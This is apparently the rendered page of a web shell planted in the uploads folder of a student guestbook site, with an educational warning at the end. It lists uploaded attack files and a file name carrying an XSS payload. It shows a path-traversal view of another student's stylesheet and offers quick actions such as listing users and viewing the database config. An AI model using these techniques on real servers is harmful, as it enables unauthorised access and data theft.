🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../583521.klas4s23.mid-ica.nl/public_html/gouden_voetbalschoen/style.css

/* Algemene opmaak */
body {
    font-family: Arial, sans-serif;
    margin: 0;
    padding: 0;
    background-color: #f4f4f9;
    color: #333;
    line-height: 1.6;
}

a.button{
    text-decoration: none;
    color: white;
}

/* Container voor inhoud */
.container {
    width: 80%;
    margin: auto;
    overflow: hidden;
    padding: 20px 0;
}

.calendar-header {
    display: flex;
    justify-content: center;
    align-items: center;
}

.date{
    text-align: center;
    color: #444;
    margin-bottom: 20px;
    font-size: 2rem;
}

/* Koppen */
h1, h2 {
    text-align: center;
    color: #444;
    margin-bottom: 20px;
}

/* Tabellen */
table {
    width: 100%;
    border-collapse: collapse;
    margin: 20px 0;
    font-size: 1rem;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    background-color: #fff;
}

table th, table td {
    border: 1px solid #ddd;
    padding: 12px;
    text-align: left;
    height: 54px;
}

table th {
    background-color: #f4f4f9;
    color: #444;
    text-transform: uppercase;
    font-weight: bold;
}

table tr:nth-child(even) {
    background-color: #f9f9f9;
}

table tr:hover {
    background-color: #eaeaea;
}

/* Formulieren */
form {
    background: #fff;
    padding: 20px;
    margin: 20px auto;
    border-radius: 8px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
    max-width: 500px;
}

form label {
    display: block;
    font-weight: bold;
    margin-bottom: 5px;
    color: #444;
    margin-top: 1rem;
}

form input[type="text"],
form input[type="password"],
form input[type="date"],
form input[type="time"],
form textarea,
form select {
    width: 100%;
    padding: 10px;
    margin-bottom: 10px;
    border: 1px solid #ddd;
    border-radius: 4px;
    font-size: 1rem;
    margin-left: -0.6rem;
}

form button {
    background-color: #007bff;
    color: #fff;
    border: none;
    padding: 10px 20px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
}

form button:hover {
    background-color: #0056b3;
}

/* Meldingen */
p {
    text-align: center;
}

p[style*="color: red"] {
    background-color: #ffe6e6;
    color: #a94442;
    padding: 10px;
    border: 1px solid #f5c6cb;
    border-radius: 4px;
    margin: 20px 0;
}

p[style*="color: green"] {
    background-color: #e6ffe6;
    color: #3c763d;
    padding: 10px;
    border: 1px solid #d4edda;
    border-radius: 4px;
    margin: 20px 0;
}

/* Navigatiebalk */
nav {
    background: #007bff;
    color: #fff;
    padding: 10px 0;
    text-align: center;
}

nav a {
    color: #fff;
    text-decoration: none;
    margin: 0 15px;
    font-weight: bold;
}

nav a:hover {
    text-decoration: underline;
}
.calendar--header{
    background-color: #007bff;
}


/* Knoppen in tabellen */
table button {
    background-color: #007bff;
    color: #fff;
    border: none;
    padding: 5px 10px;
    cursor: pointer;
    font-size: 0.9rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
}

table button:hover {
    background-color: #0056b3;
}

/* Footer */
footer {
    text-align: center;
    padding: 20px;
    background-color: #444;
    color: #fff;
    margin-top: 20px;
}

form p {
    text-align: center;
    margin-top: 10px;
}

form p a {
    color: #007bff;
    text-decoration: none;
    font-weight: bold;
}

form p a:hover {
    text-decoration: underline;
}

/* Kalenderweergave */
.calendar {
    display: grid;
    grid-template-columns: repeat(7, 1fr);
    gap: 10px;
    margin-top: 20px;
}

.calendar-day {
    border: 1px solid #ddd;
    padding: 10px;
    height: 100px;
    text-align: center;
    position: relative;
 height: 200px; 
}

.calendar-day-header {
    font-weight: bold;
    background-color: #007bff;
    color: white;
    padding: 5px 0;
    height: 40px;
}

.calendar-day-content {
    font-size: 0.9rem;
    margin-top: 5px;
    color: #333;
}

.today {
    background-color: #e0f7fa;
}

.go-back-btn{
    width:  75px;
    height: 45px;
    background-color: #28a745;
    color: white;
    display: flex;
    justify-content: center;
    align-items: center;
    border-radius: 5px;
    list-style: none;
    text-decoration: none;
}

.navigation-container{
    display: flex;
    flex-direction: column;
    align-items: center;
    justify-self: center;
}

.navigation{
    display: flex;
    flex-direction: column;
    gap: 2rem;
}

.navigation > form{
    display: flex;
    margin: 0 auto;
}

.actions{
    display: flex; 
    justify-content: center;
    align-items: center;
    gap: 2rem;
    padding: 0;
    height: auto;
    padding-left: 1rem;
}

.createModal {
    display: flex;
    justify-content: center;
    align-items: center;
    gap: 1rem;
}

.createModal button a {
    list-style: none;
    text-decoration: none;
}

.new-user-btn-container{
    display: flex;
    justify-content: center; /* Zorgt ervoor dat de knop horizontaal gecentreerd wordt */
    align-items: center; 
}

.new-user-btn{
    background-color: #007bff;
    color: white;
    display: inline-flex; /* Zorgt ervoor dat de knop alleen de breedte van de tekst pakt */
    justify-content: center;
    align-items: center;
    border-radius: 5px;
    padding: 10px 20px;
    text-decoration: none;
    margin-top: 2rem;
    margin-bottom: 3rem; 
}

/* Responsieve styling */
@media (max-width: 768px) {
    .container {
        width: 95%;
    }

    table, th, td {
        font-size: 0.9rem;
    }

    .calendar {
        grid-template-columns: repeat(7, 1fr);
    }
}

 .calendar-day {
    display: flex;
    flex-direction: column;
    justify-content: flex-start;
    min-height: 100px; /* Zorgt voor minimaal een hoogte voor lege dagen */
    padding: 10px;
    border: 1px solid #ddd;
    box-sizing: border-box;
}

.calendar-day-content {
    font-size: 18px;
    font-weight: bold;
    margin-bottom: 10px; /* Zorgt ervoor dat de dag en de taken gescheiden blijven */
}

.task {
    margin-top: 5px;
    padding: 5px;
    background-color: #f4f4f4;
    border-radius: 4px;
    font-size: 14px;
}

button {
    margin-top: 5px;
    padding: 5px 10px;
    color: white;
    border: none;
    border-radius: 4px;
    cursor: pointer;
}



.container-admin {
    background-color: #f9f9f9; /* Lichte achtergrond voor de container */
    border-radius: 15px;
    padding: 40px;
    box-shadow: 0 8px 16px rgba(0, 0, 0, 0.1);
    max-width: 700px;
    margin: 0 auto;
    text-align: center;
    margin-top: 10rem;
}

/* Header-styling */
.header-admin {
    font-size: 2.8em;
    color: #2C3E50;
    margin-bottom: 30px;
    font-weight: bold;
}

/* Nav-container voor de links */
.nav-container {
    display: flex;
    flex-direction: column;
    justify-content: center;
    gap: 25px;
    font-size: 1.2em;
    margin-top: 30px;
}

/* Algemene button styling voor manage_taks en logout */
.manage_taks, .logout {
    display: inline-block;
    padding: 12px 30px;
    font-size: 1.1em;
    font-weight: bold;
    border: none;
    border-radius: 8px;
    text-decoration: none;
    text-align: center;
    transition: background-color 0.3s ease, transform 0.2s ease, box-shadow 0.3s ease;
    cursor: pointer;
}

/* Achtergrond voor manage_taks (Beheer Taken) */
.manage_taks {
    background-color: #3498db; /* Blauwe achtergrond */
    color: white;
}

/* Hover effect voor manage_taks */
.manage_taks:hover {
    background-color: #2980b9;
    transform: translateY(-3px);
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
}

/* Achtergrond voor logout */
.logout {
    background-color: #e74c3c; /* Rode achtergrond */
    color: white;
}

/* Hover effect voor logout */
.logout:hover {
    background-color: #c0392b;
    transform: translateY(-3px);
    box-shadow: 0 4px 12px rgba(0, 0, 0, 0.2);
}

/* Focus effect voor toegankelijkheid */
.manage_taks:focus, .logout:focus {
    outline: none;
    box-shadow: 0 0 0 3px rgba(52, 152, 219, 0.6);
}

.cotnainer-header{
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.knop{
    background-color: #007bff;
    color: white;
    border: none;
    padding: 10px 20px;
    margin-top: 20px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
}

.login_button{
    background-color: #007bff;
    color: white;
    border: none;
    
    margin-top: 20px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
    width: 150px; /* Zorgt ervoor dat de knop niet de volledige breedte neemt */
}


.container_button{
    display: flex;
    justify-content: center;
    align-items: center;
    margin-top: -2rem;
    
}

.container_index{
    display: flex;
    flex-direction: row;
    justify-content: center;
    gap: 2rem;
    margin-bottom: 2rem;
    margin-top: 1rem;
}

.vol_button {
   color: red;
   font-weight: 600;
}

.aangemeld_button {
    color: green;
   font-weight: 600;
}

.modal {
    position: fixed;
    z-index: 1;
    left: 0;
    top: 0;
    width: 100%;
    height: 100%;
    overflow: auto;
    background-color: rgba(0, 0, 0, 0.4);
}

.modal-content {
    background-color: #fff;
    margin: 15% auto;
    padding: 20px;
    border: 1px solid #888;
    width: 50%;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
}

.close {
    color: #aaa;
    float: right;
    font-size: 28px;
    font-weight: bold;
    cursor: pointer;
}

.task_button{
    background-color: #007bff;
    color: white;
    border: none;
    padding: 10px 20px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
    text-decoration: none;
}

.back_button{
    background-color: #007bff;
    color: white;
    border: none;
    padding: 6px 23px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
    text-decoration: none;
    margin-top: 0.2rem;
}

.terug__button{
    background-color: #007bff;
    color: white;
    border: none;
    padding: 10px 20px;
    cursor: pointer;
    font-size: 1rem;
    border-radius: 4px;
    transition: background-color 0.3s ease;
}


.logout_button{
   padding: 0.1px;
   margin-bottom: 1rem;
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!